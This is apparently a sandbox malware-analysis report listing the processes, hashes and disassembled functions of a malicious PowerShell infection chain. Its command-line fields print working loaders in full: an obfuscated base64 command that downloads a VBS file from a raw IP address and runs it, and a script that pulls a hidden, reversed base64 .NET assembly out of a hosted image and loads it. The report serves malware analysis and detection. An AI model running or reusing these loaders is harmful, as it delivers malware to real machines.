Commandline:	PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"
Imagebase:	0x9e0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:34:47
Start date:	20/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.cmdline"
Imagebase:	0x620000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:34:47
Start date:	20/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4B4.tmp" "c:\Users\user\AppData\Local\Temp\e0waei52\CSC9C05B393FD2448C976B42B57429CCF7.TMP"
Imagebase:	0x540000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:34:53
Start date:	20/12/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\economicthingsaregoingaroundwithhusbandwithgoodne.vbs"
Imagebase:	0x850000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:34:53
Start date:	20/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = New-Object System.Net.WebClient;$centralised = $orlage.DownloadData($antisiphonal);$slanshacks = [System.Text.Encoding]::UTF8.GetString($centralised);$commends = '<<BASE64_START>>';$Lemaitre = '<<BASE64_END>>';$ependymis = $slanshacks.IndexOf($commends);$transcolation = $slanshacks.IndexOf($Lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.Length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.Substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.ToCharArray() \| ForEach-Object { $_ })[-1..-($dorsolumbar.Length)];$carinately = [System.Convert]::FromBase64String($keltologist);$brite = [System.Reflection.Assembly]::Load($carinately);$helygia = [dnlib.IO.Home].GetMethod('VAI');$helygia.Invoke($null, @('0/qvVum/r/ee.etsap//:sptth', 'creance', 'creance', 'creance', 'CasPol', 'creance', 'creance','creance','creance','creance','creance','creance','1','creance','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
Imagebase:	0x9e0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:34:53
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8.6%
Total number of Nodes:	58
Total number of Limit Nodes:	7

Executed Functions

Function 009D7A18 Relevance: 1.9, APIs: 1, Instructions: 355
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1829736350.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f8a5867581729ec4ddd77e128c44401d13d2aaf3afc1e72ae493a994a0b4e9f
Instruction ID: b1fc810e73b05073fe2391063595f168ebb540d67684870ad46e778b9d555880
Opcode Fuzzy Hash: 8f8a5867581729ec4ddd77e128c44401d13d2aaf3afc1e72ae493a994a0b4e9f
Instruction Fuzzy Hash: A3E1F975A04219EFCB05CF98D484A9EFBB6FF48310F24C55AE804AB351D775AD81CB90

Function 07091F40 Relevance: 5.4, Strings: 4, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'fq, xrefs: 07092288
4'fq, xrefs: 0709227E
4'fq, xrefs: 070923D8
4'fq, xrefs: 070923E2

Memory Dump Source

Source File: 00000003.00000002.1834448720.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7090000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$4'fq$4'fq
API String ID: 0-359900465
Opcode ID: 6ef2e04c7883bc313aa1903f937b730e7c7e49976dcbcd2570b78ac12403062a
Instruction ID: 93daf4a1e239895057612efc8700238298ab69e58bd932dcbf725e4ddbf82d8d
Opcode Fuzzy Hash: 6ef2e04c7883bc313aa1903f937b730e7c7e49976dcbcd2570b78ac12403062a
Instruction Fuzzy Hash: E8C116B1B04206EFCF658B68881067EBBE2AFD5210F1481BAD515CF781EB31CD91D7A2

Function 07094610 Relevance: 2.9, Strings: 2, Instructions: 441
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tPfq, xrefs: 07094652
tPfq, xrefs: 07094648

Memory Dump Source

Source File: 00000003.00000002.1834448720.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7090000_powershell.jbxd

Similarity

API ID:
String ID: tPfq$tPfq
API String ID: 0-2659045182
Opcode ID: cb937ab6a99669a70d6d1c401baf32cabef772d682e36e4c433d79225eb7d630
Instruction ID: 557c71ee5d05df54b097b634a771802e936f11855270dd3833f15c178d51d496
Opcode Fuzzy Hash: cb937ab6a99669a70d6d1c401baf32cabef772d682e36e4c433d79225eb7d630
Instruction Fuzzy Hash: 61F1CEB1B002499BCF159FA88450A6BBBE6EBC9310F248579F9059B381DB71DC82DB91

Function 070904F8 Relevance: 2.7, Strings: 2, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tPfq, xrefs: 0709057E
tPfq, xrefs: 0709058A

Memory Dump Source

Source File: 00000003.00000002.1834448720.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7090000_powershell.jbxd

Similarity

API ID:
String ID: tPfq$tPfq
API String ID: 0-2659045182
Opcode ID: a1221709e0034a7fca141f09032a0ddb02120a60e91c27be2823825680da7f18
Instruction ID: 40940daf20ac05e8cfe23d1ea0168a88e29c2fe5e149c3bea3b60e08a3ba0726
Opcode Fuzzy Hash: a1221709e0034a7fca141f09032a0ddb02120a60e91c27be2823825680da7f18
Instruction Fuzzy Hash: 415114B1B00226AFCB605B688810B2BBBE6EBC5710F14817AE945DF3C1DA71DC45C3A1

Function 009D1BA1 Relevance: 1.6, APIs: 1, Instructions: 125
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1829736350.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1acb7f0054f1fe656799d7cc53fc45e482da300a4447bae259640f4a94780b4
Instruction ID: dca326a39ca2bbab1aecf0c297799492993adbc772982dee9f38b9c4b1f69d66
Opcode Fuzzy Hash: b1acb7f0054f1fe656799d7cc53fc45e482da300a4447bae259640f4a94780b4
Instruction Fuzzy Hash: 63419CB6C09359AFCB05CFA9D884ADEFFB4FB49310F1580AAE514A7321D3749904CBA1

Function 009D1BF8 Relevance: 1.6, APIs: 1, Instructions: 68
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 009D7E99

Memory Dump Source

Source File: 00000003.00000002.1829736350.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9d0000_powershell.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: 5233a7d66633817705f9d42c63e9583e125ab9e871824e40bbcb215fc606dd5e
Instruction ID: 7198b9881d231d359f9e579e690b96c3af0bf946abddd4bf4092f1fcb35b6087
Opcode Fuzzy Hash: 5233a7d66633817705f9d42c63e9583e125ab9e871824e40bbcb215fc606dd5e
Instruction Fuzzy Hash: 8B2106B5D01259DFCB10CF99D984ADEFBB4FB48310F10855AE918A7310D374A954CBA0

Function 070945AC Relevance: 1.5, Strings: 1, Instructions: 275
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tPfq, xrefs: 07094648

Memory Dump Source

Source File: 00000003.00000002.1834448720.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7090000_powershell.jbxd

Similarity

API ID:
String ID: tPfq
API String ID: 0-3170913260
Opcode ID: a7435a398c64922f95f65e8a24bab4e97071c946862311b96c02c72c5a4dad27
Instruction ID: 7715af4b6d872346a20c781f8a551ac1300038f7d1880afff26d89f0f68015ec
Opcode Fuzzy Hash: a7435a398c64922f95f65e8a24bab4e97071c946862311b96c02c72c5a4dad27
Instruction Fuzzy Hash: 13A1B2B0A002859BCF54CF58C440A6BBBF6BF89310F2586B9F8159B391C731EC86DB91

Non-executed Functions

Function 009D0875 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1829736350.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f4ddcda585dc269ea5cabb6531903ef6611f8314d970a0eaf20b444b12509bb
Instruction ID: 1d8525fc012e2d096033883101a222da70b98ce6661118b267b4e83a63be61d9
Opcode Fuzzy Hash: 3f4ddcda585dc269ea5cabb6531903ef6611f8314d970a0eaf20b444b12509bb
Instruction Fuzzy Hash: AF31466645E3958ED3039A3844A26C53F51EFA3310B2614E7D1C8DF673D624D81AC7C6

Function 070915A8 Relevance: 9.2, Strings: 7, Instructions: 488COMMON

Download Yara Rule

Strings

$fq, xrefs: 070915BA
4'fq, xrefs: 0709180F
4'fq, xrefs: 07091819
$fq, xrefs: 070915EC
tPfq, xrefs: 07091625
$fq, xrefs: 070915E0
tPfq, xrefs: 07091631

Memory Dump Source

Source File: 00000003.00000002.1834448720.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7090000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq
API String ID: 0-332123906
Opcode ID: 865694ba7c50af7a4498e35b0d14815a3f39573245d9ff66437d806c19adc701
Instruction ID: d3b5b504fbbb7a1ae82a963510af2b31b030ddb9f51fd7415aad8414a1ca683d
Opcode Fuzzy Hash: 865694ba7c50af7a4498e35b0d14815a3f39573245d9ff66437d806c19adc701
Instruction Fuzzy Hash: 47F136B1B0420B8FCF649B7894006AAFBE6AFD6320F14827AD555CB391DB31CD46D7A1

Function 07090080 Relevance: 7.6, Strings: 6, Instructions: 89COMMON

Download Yara Rule

Strings

$fq, xrefs: 070901B6
4'fq, xrefs: 070900EB
$fq, xrefs: 070901C2
$fq, xrefs: 070900D6
$fq, xrefs: 070900CA
4'fq, xrefs: 070900F7

Memory Dump Source

Source File: 00000003.00000002.1834448720.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7090000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$$fq$$fq$$fq$$fq
API String ID: 0-1793556278
Opcode ID: 20c8e9c28d25affa8e56124ff04775eb1b682c546c9597ef7bee289a5c99aa1d
Instruction ID: 9dc9dc62035ebcb069455f0c6bd1095118572d636305b9c04eb1a186df40c6b4
Opcode Fuzzy Hash: 20c8e9c28d25affa8e56124ff04775eb1b682c546c9597ef7bee289a5c99aa1d
Instruction Fuzzy Hash: 3E2148B170A3978FCB664628581096A7FA66FC3210F2942BBD184DB3D7DE648C45D3A2

Function 07093D30 Relevance: 6.5, Strings: 5, Instructions: 291COMMON

Download Yara Rule

Strings

4=Bl, xrefs: 070940BF
4'fq, xrefs: 07093DE2
4'fq, xrefs: 07093F77
4'fq, xrefs: 07093DD6
4'fq, xrefs: 07093F83

Memory Dump Source

Source File: 00000003.00000002.1834448720.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7090000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$4'fq$4'fq$4=Bl
API String ID: 0-2686725892
Opcode ID: 5c0955e2320ff6fa78ae5cf04e87dcecf2cf3f3f57030f636ce7c45c12080c86
Instruction ID: 11a447a11ea0a4a52630aa14b2a89a1b8d4734856571b0bd5437520836575036
Opcode Fuzzy Hash: 5c0955e2320ff6fa78ae5cf04e87dcecf2cf3f3f57030f636ce7c45c12080c86
Instruction Fuzzy Hash: 2DA155B0B082469FCF958B78C41066AFFF1AF86214F1481BBE055CB292EB35CC45DBA1

Function 07093550 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$fq, xrefs: 070935AC
$fq, xrefs: 07093562
$fq, xrefs: 0709357E
$fq, xrefs: 070935B8

Memory Dump Source

Source File: 00000003.00000002.1834448720.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7090000_powershell.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq
API String ID: 0-2113499236
Opcode ID: 795306e0605e2ae8512c1b512ff05c8d9b82ee79f4c7aa71f310e39315f8fda6
Instruction ID: b9a183bdbf7a398dac4c9638260d725ca4cfb9303a8a747928c6713329e1727d
Opcode Fuzzy Hash: 795306e0605e2ae8512c1b512ff05c8d9b82ee79f4c7aa71f310e39315f8fda6
Instruction Fuzzy Hash: 342147F17143526BDF7896AA8840B2BFADA9BC5715F24C13AA545CB3C1DD32C840DB61

Analysis Process: powershell.exePID: 2492, Parent PID: 6036COMMON

Executed Functions

Function 03438CD0 Relevance: 5.4, Strings: 4, Instructions: 401COMMON

Download Yara Rule

Strings

@, xrefs: 0343906F
TJkq, xrefs: 03438F93
TJkq, xrefs: 03438D7C
Tefq, xrefs: 03438F70

Memory Dump Source

Source File: 00000007.00000002.2121742438.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3430000_powershell.jbxd

Similarity

API ID:
String ID: @$TJkq$TJkq$Tefq
API String ID: 0-2909286035
Opcode ID: d63c9c7164f2b228c284b61b4fc0594a9adde9c4e8a6bdb089bce47c0f6147c8
Instruction ID: c38a9e374063c0164e183fc907be8088117e0bdb13aba7ffce510decc62b6084
Opcode Fuzzy Hash: d63c9c7164f2b228c284b61b4fc0594a9adde9c4e8a6bdb089bce47c0f6147c8
Instruction Fuzzy Hash: C212B174E05228CFDB54CF69D984B9DBBF2BF89310F1081AAE409AB361DB709985CF15

Function 03438CC1 Relevance: 5.3, Strings: 4, Instructions: 349COMMON

Download Yara Rule

Strings

@, xrefs: 0343906F
TJkq, xrefs: 03438F93
TJkq, xrefs: 03438D7C
Tefq, xrefs: 03438F70

Memory Dump Source

Source File: 00000007.00000002.2121742438.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3430000_powershell.jbxd

Similarity

API ID:
String ID: @$TJkq$TJkq$Tefq
API String ID: 0-2909286035
Opcode ID: 7a94942f7e9b2ef1a8c2032e28afefc0c49ff62644a841a220772d1e406e80d3
Instruction ID: aeaf6974c67c095a74e49cac9c15c71a6903af3d6a856c85f63f28139dcc8b64
Opcode Fuzzy Hash: 7a94942f7e9b2ef1a8c2032e28afefc0c49ff62644a841a220772d1e406e80d3
Instruction Fuzzy Hash: 43F1C374E05228CFDB54CF69D984B9DFBB2BF89310F10819AE809AB361DB709985CF15

Function 03437648 Relevance: 1.0, Instructions: 1040COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2121742438.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e3b90f8981e37036666a76725c6b96e79e9c614423ce4f874ab5409fc114890
Instruction ID: 232698456de7dd3ea4b16cc6b596a9119be8d06e431ad590b07c12ec883f58db
Opcode Fuzzy Hash: 4e3b90f8981e37036666a76725c6b96e79e9c614423ce4f874ab5409fc114890
Instruction Fuzzy Hash: B7C2A074E01228CFDB65DF64D898B9DBBB2BB49301F1091EAD909A7350DB349E85CF50

Function 03438A21 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2121742438.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b11fac09274a59eb1b3efe1967a8f848092c73b2cd4815fe5544f2f0983f4ad7
Instruction ID: aadb5218ee35b9b077513666ba1c5d4b168351301a48439ef2e9ee180f0637cb
Opcode Fuzzy Hash: b11fac09274a59eb1b3efe1967a8f848092c73b2cd4815fe5544f2f0983f4ad7
Instruction Fuzzy Hash: 71217FB0C4A248EBDB00EFA4D5446ADFBB9EB4F301F00A596A0597B241C7745B499B08

Function 03438A30 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2121742438.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff6ac043dde6b9802bc72a5633874ad3fc5f058a87f6b43f33c5bc1000523ef1
Instruction ID: f02945690aab4bc65cbbef312a0c14bf7c2419123a6508d417f28f7be72f7b5a
Opcode Fuzzy Hash: ff6ac043dde6b9802bc72a5633874ad3fc5f058a87f6b43f33c5bc1000523ef1
Instruction Fuzzy Hash: 73217CB0C4A248EBDB00EFA4D5447ADFBB9EB4F301F10B495A0197B201CB745A499B08

Function 079A0978 Relevance: 16.7, Strings: 13, Instructions: 473COMMON

Download Yara Rule

Strings

$fq, xrefs: 079A0A98
$fq, xrefs: 079A0D8F
$fq, xrefs: 079A0A36
4'fq, xrefs: 079A0AB3
4'fq, xrefs: 079A0C5B
4'fq, xrefs: 079A0C4F
$fq, xrefs: 079A0DF1
$fq, xrefs: 079A0DD3
$fq, xrefs: 079A0DC7
$fq, xrefs: 079A0DE5
$fq, xrefs: 079A0A8C
$fq, xrefs: 079A0DAB
4'fq, xrefs: 079A0ABF

Memory Dump Source

Source File: 00000007.00000002.2155825646.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$4'fq$4'fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
API String ID: 0-3149445312
Opcode ID: ca1f9600a5cb5e7a13bf63cd21a6e6233d04a49a67b7bcf2e48aa0362db122a0
Instruction ID: baca995e1d05316a2e42a9233877bb5884e9c094914d7c3ab5c0419f063c12d0
Opcode Fuzzy Hash: ca1f9600a5cb5e7a13bf63cd21a6e6233d04a49a67b7bcf2e48aa0362db122a0
Instruction Fuzzy Hash: 14F117B1B06306AFDB249B7D845476ABBAAAF85318F24847AD445CB281FF31C841C7E1

Function 079A1FC0 Relevance: 14.3, Strings: 11, Instructions: 538COMMON

Download Yara Rule

Strings

4'fq, xrefs: 079A2266
4'fq, xrefs: 079A225A
4'fq, xrefs: 079A2400
$fq, xrefs: 079A2083
$fq, xrefs: 079A2077
(ofq, xrefs: 079A25CE
4'fq, xrefs: 079A240C
4'fq, xrefs: 079A209A
$fq, xrefs: 079A205B
(ofq, xrefs: 079A25DE
4'fq, xrefs: 079A20A6

Memory Dump Source

Source File: 00000007.00000002.2155825646.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID: (ofq$(ofq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$$fq$$fq$$fq
API String ID: 0-91259311
Opcode ID: 5c509ec3f7edf025a43fc8790746ede207122bedec03a134270d8a01f9818b76
Instruction ID: 56b9a2fa39bc431b6cf380ded66b10a728610f44d3f8be7ec034252fab1df5f1
Opcode Fuzzy Hash: 5c509ec3f7edf025a43fc8790746ede207122bedec03a134270d8a01f9818b76
Instruction Fuzzy Hash: DB02E3B1B0620AEFCF14CF68C8546AABBB6BFC5318F14847AD9558B291DB31C845CBD1

Function 079A1448 Relevance: 12.8, Strings: 10, Instructions: 334COMMON

Download Yara Rule

Strings

$fq, xrefs: 079A149F
4'fq, xrefs: 079A1562
4'fq, xrefs: 079A16D4
$fq, xrefs: 079A14F8
$fq, xrefs: 079A1504
4'fq, xrefs: 079A1556
$fq, xrefs: 079A16BB
$fq, xrefs: 079A1693
$fq, xrefs: 079A16AF
4'fq, xrefs: 079A16E0

Memory Dump Source

Source File: 00000007.00000002.2155825646.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$4'fq$4'fq$$fq$$fq$$fq$$fq$$fq$$fq
API String ID: 0-1802041116
Opcode ID: 66887581b4a202ae89a58ad4311213f95912fb0bd9c12e8a4814bd59878536f5
Instruction ID: 5785935b7a5f3d3ec7203cc54994c7b52abf09c4b1a5a19764a31c87c54de804
Opcode Fuzzy Hash: 66887581b4a202ae89a58ad4311213f95912fb0bd9c12e8a4814bd59878536f5
Instruction Fuzzy Hash: 7FB108B5B4120AEFCB258F7D840067ABBFAAF81319F18847AD945CB291DB35C941C7E1

Function 079A3CC8 Relevance: 5.6, Strings: 4, Instructions: 645COMMON

Download Yara Rule

Strings

4'fq, xrefs: 079A4006
4'fq, xrefs: 079A4010
4'fq, xrefs: 079A4160
4'fq, xrefs: 079A416A

Memory Dump Source

Source File: 00000007.00000002.2155825646.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$4'fq$4'fq
API String ID: 0-359900465
Opcode ID: 8e3e304284887df7a9d1aadbce55ab63867a7bdf6ba0aba67a397892b4e98c86
Instruction ID: 985c4e0ec8c100bb53623c0ae47305bbab8fbbe192023f42da05154d75bda936
Opcode Fuzzy Hash: 8e3e304284887df7a9d1aadbce55ab63867a7bdf6ba0aba67a397892b4e98c86
Instruction Fuzzy Hash: FA2224F1B05346AFCB258B6C880176ABBAAAFD1318F2484BAD505CB691DF71DC41C7E1

Function 079A0958 Relevance: 3.9, Strings: 3, Instructions: 114COMMON

Download Yara Rule

Strings

$fq, xrefs: 079A0A8C
$fq, xrefs: 079A0A36
4'fq, xrefs: 079A0AB3

Memory Dump Source

Source File: 00000007.00000002.2155825646.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$$fq$$fq
API String ID: 0-2297391932
Opcode ID: f34ac0e796f898ceae70f2fdd0c6927135d9e833278a31b981499fde4bf7b848
Instruction ID: 6bf996527acd6d1bd344efe09636e8d174b0d46d7fca79211d28c1f35f7c8c65
Opcode Fuzzy Hash: f34ac0e796f898ceae70f2fdd0c6927135d9e833278a31b981499fde4bf7b848
Instruction Fuzzy Hash: 463100F0606306AFEF218B6DD51476A7BAAAF8575CF148076D808CB291FB35C884C7E1

Function 079A1428 Relevance: 3.9, Strings: 3, Instructions: 101COMMON

Download Yara Rule

Strings

$fq, xrefs: 079A149F
$fq, xrefs: 079A14F8
